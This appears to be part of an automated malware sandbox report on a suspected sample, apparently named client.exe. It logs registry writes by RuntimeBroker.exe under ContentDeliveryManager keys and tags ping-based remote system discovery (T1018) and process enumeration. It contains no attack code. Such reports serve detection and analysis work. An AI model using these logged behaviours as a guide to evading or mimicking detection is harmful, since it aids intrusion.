Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0e2812c3-e1b9-4b71- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\63539584-ce88-4dfb- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000013f308e810f6d90113f308e810f6d90113f308e810f6d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004357ed7d2000323165613464363763303633633361626239656636306265636235323562666131653431323663343731623565613230333338633530343031303563623237640000b20009000400efbe4357ed7d4357ed7d2e00000000000000000000000000000000000000000000000000ed872e00320031006500610034006400360037006300300036003300630033006100620062003900650066003600300062006500630062003500320035006200660061003100650034003100320036006300340037003100620035006500610032003000330033003800630035003000340030003100300035006300620032003700640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003e2c672e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32316561346436376330363363336162623965663630626563623532356266613165343132366334373162356561323033333863353034303130356362323764000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e066aa0dde9d53ee1193594adcbaa3176004d162da5a6511448a0333de6d2491e066aa0dde9d53ee1193594adcbaa31760ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2957fe32-f53d-44a8- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000737c31e810f6d901737c31e810f6d901737c31e810f6d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004357ed7d2000656231363266663235666536613861303664613733393263313036346139346230356562656531666337333137623533313566363864336466333536393936660000b20009000400efbe4357ed7d4357ed7d2e000000000000000000000000000000000000000000000000008dfe0500650062003100360032006600660032003500660065003600610038006100300036006400610037003300390032006300310030003600340061003900340062003000350065006200650065003100660063003700330031003700620035003300310035006600360038006400330064006600330035003600390039003600660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003e2c672e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65623136326666323566653661386130366461373339326331303634613934623035656265653166633733313762353331356636386433646633353639393666000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e068aa0dde9d53ee1193594adcbaa3176004d162da5a6511448a0333de6d2491e068aa0dde9d53ee1193594adcbaa31760ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1404eb1a-972f-4738- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4db4e54902f330a22194a54dd058dc74bfad2b2f5d03046caa083bb727b823ef"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5c7144b0-186e-4ca1-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2957fe32-f53d-44a8-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2957fe32-f53d-44a8- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\eb162ff25fe6a8a06da7392c1064a94b05ebee1fc7317b5315f68d3df356996f"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fadb6b6e-fe2c-47d8- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\107688e2-594b-4fcf- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000640f08e910f6d901200d27e910f6d901200d27e910f6d901f6eb05000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004357ed7d2000656231363266663235666536613861303664613733393263313036346139346230356562656531666337333137623533313566363864336466333536393936660000b20009000400efbe4357ed7d4357ed7d2e000000000000000000000000000000000000000000000000008dfe0500650062003100360032006600660032003500660065003600610038006100300036006400610037003300390032006300310030003600340061003900340062003000350065006200650065003100660063003700330031003700620035003300310035006600360038006400330064006600330035003600390039003600660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003e2c672e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65623136326666323566653661386130366461373339326331303634613934623035656265653166633733313762353331356636386433646633353639393666000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e071aa0dde9d53ee1193594adcbaa3176004d162da5a6511448a0333de6d2491e071aa0dde9d53ee1193594adcbaa31760ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79c858f-703e-4f0c- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a2c83fe810f6d901a2c83fe810f6d901a2c83fe810f6d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004357ee7d2000343264663737313365323136613837623133313866353533653466323337343233323931316330623563353431353630653764303330626164353436363463630000b20009000400efbe4357ee7d4357ee7d2e000000000000000000000000000000000000000000000000005edf2801340032006400660037003700310033006500320031003600610038003700620031003300310038006600350035003300650034006600320033003700340032003300320039003100310063003000620035006300350034003100350036003000650037006400300033003000620061006400350034003600360034006300630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003e2c672e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34326466373731336532313661383762313331386635353365346632333734323332393131633062356335343135363065376430333062616435343636346363000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e069aa0dde9d53ee1193594adcbaa3176004d162da5a6511448a0333de6d2491e069aa0dde9d53ee1193594adcbaa31760ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1404eb1a-972f-4738- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000043184ee810f6d90143184ee810f6d90143184ee810f6d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004357ee7d2000346462346535343930326633333061323231393461353464643035386463373462666164326232663564303330343663616130383362623732376238323365660000b20009000400efbe4357ee7d4357ee7d2e00000000000000000000000000000000000000000000000000bd8f1a01340064006200340065003500340039003000320066003300330030006100320032003100390034006100350034006400640030003500380064006300370034006200660061006400320062003200660035006400300033003000340036006300610061003000380033006200620037003200370062003800320033006500660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003e2c672e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34646234653534393032663333306132323139346135346464303538646337346266616432623266356430333034366361613038336262373237623832336566000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e06aaa0dde9d53ee1193594adcbaa3176004d162da5a6511448a0333de6d2491e06aaa0dde9d53ee1193594adcbaa31760ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5d24efca-12ea-4555- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e4c2bbe810f6d901200d27e910f6d901200d27e910f6d901759604000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004357ed7d2000323165613464363763303633633361626239656636306265636235323562666131653431323663343731623565613230333338633530343031303563623237640000b20009000400efbe4357ed7d4357ed7d2e00000000000000000000000000000000000000000000000000ed872e00320031006500610034006400360037006300300036003300630033006100620062003900650066003600300062006500630062003500320035006200660061003100650034003100320036006300340037003100620035006500610032003000330033003800630035003000340030003100300035006300620032003700640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003e2c672e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32316561346436376330363363336162623965663630626563623532356266613165343132366334373162356561323033333863353034303130356362323764000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e06eaa0dde9d53ee1193594adcbaa3176004d162da5a6511448a0333de6d2491e06eaa0dde9d53ee1193594adcbaa31760ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fadb6b6e-fe2c-47d8-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\737765c6-30e8-48fb- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5d24efca-12ea-4555-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd0871d4-f5e7-441c- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000df3cb2e810f6d90161afe6e810f6d90161afe6e810f6d901640204000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004357ed7d2000346465303365393036376630613935373261393664303235316566333261343662323232613233306661343636343135326535656466663163336266663166380000b20009000400efbe4357ed7d4357ed7d2e000000000000000000000000000000000000000000000000004d4e1400340064006500300033006500390030003600370066003000610039003500370032006100390036006400300032003500310065006600330032006100340036006200320032003200610032003300300066006100340036003600340031003500320065003500650064006600660031006300330062006600660031006600380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003e2c672e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34646530336539303637663061393537326139366430323531656633326134366232323261323330666134363634313532653565646666316333626666316638000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e06faa0dde9d53ee1193594adcbaa3176004d162da5a6511448a0333de6d2491e06faa0dde9d53ee1193594adcbaa31760ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0e2812c3-e1b9-4b71- = "8324"	RuntimeBroker.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2916 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2916 PING.EXE

pid	process
2916	PING.EXE

pid	process
2916	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
3652	client.exe
3652	client.exe
4100	powershell.exe
4100	powershell.exe
4100	powershell.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
